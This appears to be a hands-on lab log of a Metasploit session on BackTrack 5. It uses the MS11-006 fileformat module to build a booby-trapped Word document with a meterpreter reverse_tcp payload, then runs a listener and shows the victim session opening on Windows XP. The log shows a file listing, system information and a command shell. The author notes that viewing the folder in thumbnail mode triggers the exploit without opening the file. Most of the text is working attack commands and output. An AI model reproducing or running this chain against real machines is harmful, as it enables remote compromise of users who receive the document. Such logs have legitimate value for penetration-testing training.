Environment: BT5R1
msf > use windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(ms11_006_createsizeddibsection) > set LPORT 443
LPORT => 443
msf exploit(ms11_006_createsizeddibsection) > set OUTPUTPATH /opt/framework/msf3/data/exploits/
OUTPUTPATH => /opt/framework/msf3/data/exploits/
msf exploit(ms11_006_createsizeddibsection) > show options
Module options (exploit/windows/fileformat/ms11_006_createsizeddibsection):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
OUTPUTPATH /opt/framework/msf3/data/exploits/ yes The output path to use.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC seh yes Exit technique: seh, thread, process, none
LHOST 192.168.1.11 yes The listen address
LPORT 443 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms11_006_createsizeddibsection) > exploit
[*] Creating 'msf.doc' file ...
[*] Generated output file /opt/framework/msf3/data/exploits/msf.doc
msf exploit(ms11_006_createsizeddibsection) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.11:443
[*] Starting the payload handler...
msf exploit(handler) > sessions -l
Active sessions
===============
No active sessions.
msf exploit(handler) >
I copied msf.doc onto the XP machine. At first I double-clicked it and BT5 showed no reaction.
Later I switched the folder to thumbnail view; without double-clicking msf.doc at all, BT5 got a response (the book says the document has to be opened, which I suspect is a mistake).
msf exploit(handler) >
[*] Sending stage (752128 bytes) to 192.168.1.143
[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.143:1099) at 2013-05-14 19:32:47 -0400
msf exploit(handler) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 ROOT-4556186478\Administrator @ ROOT-4556186478 192.168.1.11:443 -> 192.168.1.143:1099
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: C:\Documents and Settings\Administrator
================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2013-05-14 10:20:44 -0400 .
40777/rwxrwxrwx 0 dir 2013-05-14 10:20:43 -0400 ..
40555/r-xr-xr-x 0 dir 2013-05-14 10:21:13 -0400 Application Data
40777/rwxrwxrwx 0 dir 2013-05-14 10:14:40 -0400 Cookies
40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30 -0400 Desktop
40555/r-xr-xr-x 0 dir 2013-05-14 10:21:21 -0400 Favorites
40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30 -0400 Local Settings
40555/r-xr-xr-x 0 dir 2013-05-14 10:21:22 -0400 My Documents
100666/rw-rw-rw- 786432 fil 2013-05-14 11:30:17 -0400 NTUSER.DAT
40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30 -0400 NetHood
40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30 -0400 PrintHood
40555/r-xr-xr-x 0 dir 2013-05-14 11:30:35 -0400 Recent
40555/r-xr-xr-x 0 dir 2013-05-14 10:21:02 -0400 SendTo
40555/r-xr-xr-x 0 dir 2013-05-14 17:51:30 -0400 Start Menu
40777/rwxrwxrwx 0 dir 2013-05-14 10:10:10 -0400 Templates
100666/rw-rw-rw- 1024 fil 2013-05-14 11:32:49 -0400 ntuser.dat.LOG
100666/rw-rw-rw- 178 fil 2013-05-14 10:23:33 -0400 ntuser.ini
meterpreter > sysinfo
Computer : ROOT-4556186478
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > shell
Process 1888 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator>
If you switch to a Simplified Chinese edition of XP and view the folder in thumbnail mode, it fails and no shell is obtained.